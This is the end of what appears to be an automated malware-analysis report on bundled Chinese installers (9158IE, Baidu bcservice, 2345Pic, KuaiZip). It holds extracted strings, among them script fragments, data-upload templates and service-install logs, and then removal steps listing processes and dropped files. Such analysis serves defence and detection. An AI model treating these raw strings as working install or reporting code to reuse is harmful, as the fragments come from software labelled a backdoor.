function(t, l){ window.scrollTo(l, t) }; z.timer = window.setInterval(function(){ z.step(); }, 13); } </script><script> var str; var AID=new Array; var nownum=0; function closeit(id) { document.getElementById("fixit").removeChild(document.getElementById("a_" id)); if(AID[0] == id) { AID[0]=AID[1]; AID[1]=AID[2]; } else if(AID[1] == id) AID[1]=AID[2]; else if(AID[2] == id) AID[1]=""; nownum--; if(nownum==0) window.external.HaveAnchor(0); } function newit(id,str) { window.external.HaveAnchor(1); if(nownum==3) { closeit(AID[0]); AID[2]=id; } else { AID[nownum]=id; } str="<div id='a_" id "' class='c1'><span class='c2' onclick=scroller('tag_" id "',800);closeit(" id ");>" str "</span><span onclick='closeit(" id ")' class='c3'><img border=0 src='#path#/SkinRes/star/close.png'></span></div><div style='clear:both'></div>"; document.getElementById("fixit").innerHTML=str document.getElementById("fixit").innerHTML; nownum  ; } </script>
<script>window.onerror=function(){return true;};var hearinterval;function AddSwf(sContent){document.getElementById('mybg').style.display='block';document.getElementById('mybg').innerHTML=sContent;clearInterval(hearinterval);hearinterval=window.setInterval('heartBeat()',1);}function swfMovieEnd(){clearInterval(hearinterval);document.getElementById('mybg').innerHTML='';document.getElementById('mybg').style.display='none';}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><script>var lastScrollY=0;function heartBeat(){var diffY;diffY=document.body.scrollTop;percent=.3*(diffY-lastScrollY);percent=Math.ceil(percent);document.all.mybg.style.pixelTop =percent;lastScrollY=lastScrollY percent;}</script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body style='overflow-x:hidden;overflow-y:scroll' bgcolor=#e8f3ff style="word-break:break-all"><div id='mybg' name='mybg' style='display:none;position:absolute;left:50%;width:500px;margin-left:-200px;top:0;height:350px;'></div>
<script> function DoWelcome(id,str){var obj=document.getElementById(id);if(obj.innerHTML.indexOf('
')>0) {return;}else{document.getElementById(id).innerHTML="<span style='color:#ccc; underline:none; font-weight:bold; padding-left:10px;'>  
</span>";window.external.DoForwardNotice(str);}}</script></html>
<script>window.onerror=function(){return true;}; function shake(n) {
if (window.top.moveBy) {
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i);
window.top.moveBy(-i,0);
}function On_change(msg,obj) { obj.innerHTML="<font style='color:#ffffff'>" msg "</font>"} function show_result(sUserID){window.external.OnFlashInfo(sUserID,'admin')} function thisMovie(movieName) { if(navigator.appName.indexOf("Microsoft") != -1 ) return window[movieName]; else return document[movieName]; } function play_movie(idFlash,thing,sDiceNum,isadmin,sUserID,sMsg,sBeging) { var Movie = thisMovie(idFlash); Movie.dowhat(thing,sDiceNum,isadmin,sUserID,sMsg,sBeging);} </script><style>body p,body span { margin:2px 0; line-height:1.3;}a:link {color: #0b66c2; text-decoration:underline;}</style><body overflow:scroll;overflow-x:hidden; bgcolor=#e8f3ff style="word-break:break-all">
%s9158IE.exe
ToOpenUrl2
GotoWebUrl2
UserLogin
ToOpenUrl
GotoWebUrl
OnWebMessageBox
MsgEnterRoom
AppOpenUrl
LoginErrorRoom
PassAdUser
//weibo.ini
filenew.9158.com
room/imgout1.aspx
.PAVCException@@
%u / %u
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="trackdata"; filename="%s"
--%s--
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
szData=%s
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid></info>
<?xml version="1.0" encoding="GB2312"?><info><uidx>%s</uidx><lossd>%d</lossd><nets>%d</nets><platid>%d</platid><platname>%s</platname><rip>%s</rip><tip>%s</tip><rid>%d</rid><hardw>%s</hardw></info>
%s|%.2f|%d|%.2f
Content-Type: application/x-www-form-urlencoded
.PAVCInternetException@@
VideoHelper.dll
9158VCComm.dll
5.0.0.3
CWebBrowser2
version="1.0.0.0"
name="9158.exe.manifest"
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
9158IE.EXE

bcservice.exe_2752:

.text
`.rdata
@.data
.rsrc
@.reloc
.\BDZCInstallConfig.cpp
[CBDZCInstallConfig::CheckMD5]Check MD5, file MD5 : %s, MD5 msg : %s
.\BDZCInstall.cpp
CopyExeFilePath
ReportProcessCrashRealTime
.\RTPServer.cpp
CRTPServer::Run
CRTPServer Run stop
d:\jenkins\workspace\bdzc_bdclient_compile\basic\Output\BinRelease\bcservice.pdb
?DelSubKey@Register@Base@@YAHPAUHKEY__@@PB_W@Z
BaseDll.dll
GetReportMgr
ReportDll.dll
UtilsDll.dll
?WriteDataCfg@CLauchReportRecord@ReportRecord@@QAEHXZ
?ReadDataCfg@CLauchReportRecord@ReportRecord@@QAEHW4CMD@Report@@@Z
?SetLastLaunchIntervalAndLastStartTime@CLauchReportRecord@ReportRecord@@QAEHXZ
??0CLauchReportRecord@ReportRecord@@QAE@XZ
GetUnInstallReportRecord
GetInstallReportRecord
ReportRecordDll.dll
PluginFrame.dll
SetProcessShutdownParameters
KERNEL32.dll
RegCreateKeyExW
RegCloseKey
RegOpenKeyExW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
PSAPI.DLL
SHLWAPI.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
SensApi.dll
VERSION.dll
bcservice.exe
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
9-929:9[9
6$6,686\6|6
explorer.exe
Advapi32.dll
LoadFileConfig, path=%s
row=%d,col=%d
y[CBDZCInstallConfig::CheckMD5]strConfigPath doesn't exist: %s
n********* m_dwFileVerifyVer = %u **********
[CBDZCInstall::CopyFolder]pFrom : %s, pTo : %s
[CBDZCInstall::CopyExeFilePath]pFrom : %s, pTo : %s, pFileName : %s
fileverify.xml
[CBDZCInstall::Install]CreateMutex Fail, lasterror : %d
u_.exe
%u.%u.%u.%u
W[CBDZCInstall::StartService]OpenService error : %d
[CBDZCInstall::StartService]StartService error : %d
[CBDZCInstall::StartService]QueryServiceStatus success : %d
[CBDZCInstall::StartService]QueryServiceStatus error : %d
\kernel32.dll
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
kernel32.dll
[CBDZCInstall::DoInstall]lastdir = %s
[CBDZCInstall::DoInstall]kill %s
[CBDZCInstall::DoInstall]uninstall server : %d
\data\*.*
[CBDZCInstall::DoInstall]delete lastdir : %s
[CBDZCInstall::DoInstall]rename and delete bdsg0001.dll/bdsg0002.dll
\Microsoft.VC80.ATL\*.*
\Microsoft.VC80.ATL
\Microsoft.VC80.CRT\*.*
\Microsoft.VC80.CRT
\*.xml
\*.ico
\BugReport.exe
\uninst.exe
\UtilsDll.dll
\ProtocolDll.dll
\ReportDll.dll
\ReportRecordDll.dll
\DownloadDll.dll
\BaseDll.dll
\PluginFrame.dll
\ReportExe.exe
\UrlEncrypt.dll
\dl.dll
[CBDZCInstall::DoInstall]strSupplyID : %s
[CBDZCInstall::DoInstall]Version %s
[CBDZCInstall::DoInstall]InstallDir %s
[CBDZCInstall::DoInstall]SupplyID %s
\drivers\x86\*.sys
\drivers\x64\*.sys
"%s\%s" %s
[CBDZCInstall::DoInstall]install server : %d
[CBDZCInstall::DoInstall]start server : %d
l\BDLogicUtils.dll
[CBDZCInstall::DoInstall]data report
ntdll.dll
dep360.exe
[CBDZCInstall::Uninstall]SupplyID = %s
[CBDZCInstall::Uninstall]strUninstallDir = %s
\BDLogicUtils.dll
[CBDZCInstall::Uninstall]Data Report
[CBDZCInstall::Uninstall]kill baiduprotect.exe
\Config\810.dat
\Config\8000.dat
[CBDZCInstall::Uninstall]RMDir %s
pbcservice.exe
Global\BDCLMutex{F2B4ACAD-47F5-4E97-A4A8-FB263B1BA5A9}
Global\BDCLEvent{98A4EF9F-D81B-4AA3-93DC-02161D4C909D}
[CRTPServer StartSystemModules Finish
pGlobal\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
pGlobal\BDCLEvent{98A4EF9F-D81B-4AA3-93DC-02161D4C909D}
Global\BDCLMutex{9950AE5C-A65D-4664-8B81-100AF4EEFCDE}
HKEY_LOCAL_MACHINE\SOFTWARE\baidu\bcservice
BugReport.exe
"%s" %s
BDCLTray.exe
2.0.3.124

2345pic_k1252705.exe_3836:

.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.}%FT
9X.LX
W.zs,
e.QST
;,;8;@;`;
0 0<0@0\0`0|0
;(;,;0;4;
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2345.com1>0<
2345.com0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://pic.2345.com/0
7%7x7
= =$=(=,=0=
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
adm\LOCALS~1\Temp\nsc1B.tmp\RCWidgetPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1B.tmp\RCWidgetPlugin.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc1B.tmp
nsc1B.tmp
c1B.tmp
\dream\2345pic_k1252705.exe -s1
D:\dream\2345pic_k1252705.exe -s1
%Program Files%\2345Soft\2345Pic
D:\dream
2345pic_k1252705.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm19.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
D:\dream\2345pic_k1252705.exe
101320537
Windows 5.1(Service Pack 3)
2345.com
5.3.1.6606
(c) 2015 2345.com


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Kuaizip_Setup_7654_1061607.exe:1100
    Baidu_Setup_1.6.200.359_ftn_1050103060.exe:572
    Baidu_Setup_1.6.200.359_ftn_1050103060.exe:3100
    bcservice.exe:2752
    KZReport.exe:1836
    9158IE.exe:3432
    9158IE.exe:2864
    YouQian_Setup.exe:2228
    KuaiZip.exe:1140
    Update.exe:1948
    Update.exe:608
    Baidu.exe:3808
    Baidu.exe:2720
    Baidu.exe:4000
    Baidu.exe:4016
    Baidu.exe:3800
    KZMount.exe:1976
    KZMount.exe:1772
    9158.exe:3180
    BugReport.exe:3376
    BugReport.exe:3248
    regsvr32.exe:1700
    regsvr32.exe:2620
    regsvr32.exe:2520
    regsvr32.exe:2444
    regsvr32.exe:596
    regsvr32.exe:2652
    regsvr32.exe:1364
    regsvr32.exe:800
    CheckerExe.exe:1644
    9158chat2_ktv097_28.exe:2072
    at.exe:1868
    at.exe:1880

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    %Program Files%\¿ìѹ\data\slimdata.dat (784 bytes)
    %Program Files%\¿ìѹ\ErrorMsg.xml (196 bytes)
    %Program Files%\¿ìѹ\readme.txt (1 bytes)
    %Program Files%\¿ìѹ\X86\KZReport.exe (5232 bytes)
    %Program Files%\¿ìѹ\X86\Uninst.exe (8122 bytes)
    %Program Files%\¿ìѹ\7zNew.dat (32 bytes)
    %Program Files%\¿ìѹ\X86\SetupHelper.exe (667 bytes)
    %Program Files%\¿ìѹ\X86\Update.exe (393 bytes)
    %Program Files%\¿ìѹ\X86\sfx\kzSetup_chs.sfx (3557 bytes)
    %Program Files%\¿ìѹ\SLDefault.xml (196 bytes)
    %Program Files%\¿ìѹ\X86\KZModule.dll (6582 bytes)
    %Program Files%\¿ìѹ\X86\KZipShell.dll (981 bytes)
    %Program Files%\¿ìѹ\ali\kzshop.ico (1686 bytes)
    %Program Files%\¿ìѹ\X86\KZMount.exe (2890 bytes)
    %Program Files%\¿ìѹ\X86\7z.dll (7131 bytes)
    %Documents and Settings%\%current user%\Desktop\¿ìѹ.lnk (661 bytes)
    %Program Files%\¿ìѹ\X86\KZFormat.dll (2028 bytes)
    %Program Files%\¿ìѹ\X86\BSCoreNew.dll (4135 bytes)
    %Program Files%\¿ìѹ\X86\Mount.dll (1490 bytes)
    %Program Files%\¿ìѹ\X86\finderlib.dll (314 bytes)
    %Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll (981 bytes)
    %Program Files%\¿ìѹ\KzNew.dat (74 bytes)
    %Program Files%\¿ìѹ\ZipNew.dat (22 bytes)
    %Program Files%\¿ìѹ\X86\MountCore.dll (863 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (30622 bytes)
    %Program Files%\¿ìѹ\__-________.URL (49 bytes)
    %Program Files%\¿ìѹ\X86\KuaiZip.exe (9092 bytes)
    %Program Files%\¿ìѹ\X86\DiskOpt.exe (4605 bytes)
    %Documents and Settings%\%current user%\Start Menu\¿ìѹ.lnk (661 bytes)
    %Program Files%\¿ìѹ\X86\KuaiZipDrive.sys (1137 bytes)
    %Program Files%\¿ìѹ\X86\DuiLib.dll (4605 bytes)
    %Program Files%\¿ìѹ\ali\jp.png (392 bytes)
    %Program Files%\¿ìѹ\X86\lang\Chs_Lang.dll (824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\InstallHelper.dll (26688 bytes)
    %WinDir%\Temp\baidu\youqian\桌面百度\YouQian_Setup.exe (25112 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (284894 bytes)
    %WinDir%\Temp\baidu\youqian\桌面百度\桌面百度.ini (1607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
    %WinDir%\Temp\baidu\youqian\桌面百度\process.cfg (210 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
    %WinDir%\Temp\baidu\youqian\桌面百度\132.exe (172202 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\BDMSkin.dll (37727 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-unchecked.png (361 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bd0001.sys (181 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\apps.db (5627 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\executor.xml (233 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_x.png (89 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-logo57x65.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Protocol.dll (24048 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\PluginSetup.xml (654 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\res_yinyue.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sleet.png (741 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\request.js (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\crash.html (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\shower.png (817 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\mod.js (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{2A53DBDC-6363-4742-8166-C38D1E5A4CF6}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_up.png (154 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\vedio_play.png (465 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-error.html (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AssociateWnd.rdb (1568 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\aladdin.html (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search-large.png (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianUI.xml (346 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-search.png (382 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-rain.png (963 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\skinres.rdb (1856 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.ATL\atl80.dll (601 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\xinwenUI.xml (342 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\icon-alert-ok.png (2392 bytes)
    %System%\drivers\BDCEnhance.sys (673 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{029F24D8-7145-43A0-A519-1F4D8E37D4AD}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\microsoft.vc80.crt.manifest (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-center-left.png (130 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{5F68585C-AF28-4793-9360-66E51B87947C}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{176966FA-0615-4A30-8CE0-1018EEFED0D2}\Microsoft.VC80.CRT\msvcp80.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\Base.dll (38904 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc9.tmp\msvcp100.dll (14184 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\366.png (5 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\drivers\x64\bduniptk.sys (291 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox-active.png (893 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{48A02D42-CF48-4601-9126-5F90C2D01273}\Microsoft.VC80.CRT\msvcm80.dll (3073 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\plugins\{324C03EF-41AC-49C7-88CE-720C670629E2}\Microsoft.VC80.CRT\msvcr80.dll (4185 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\res_weixin.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\44.png (3 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
    %Documents and Settings%\All Users\Baidu\bcservice\2.0.3.124\data\10000302.dat (904 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
    %Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2587 bytes)
    %Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
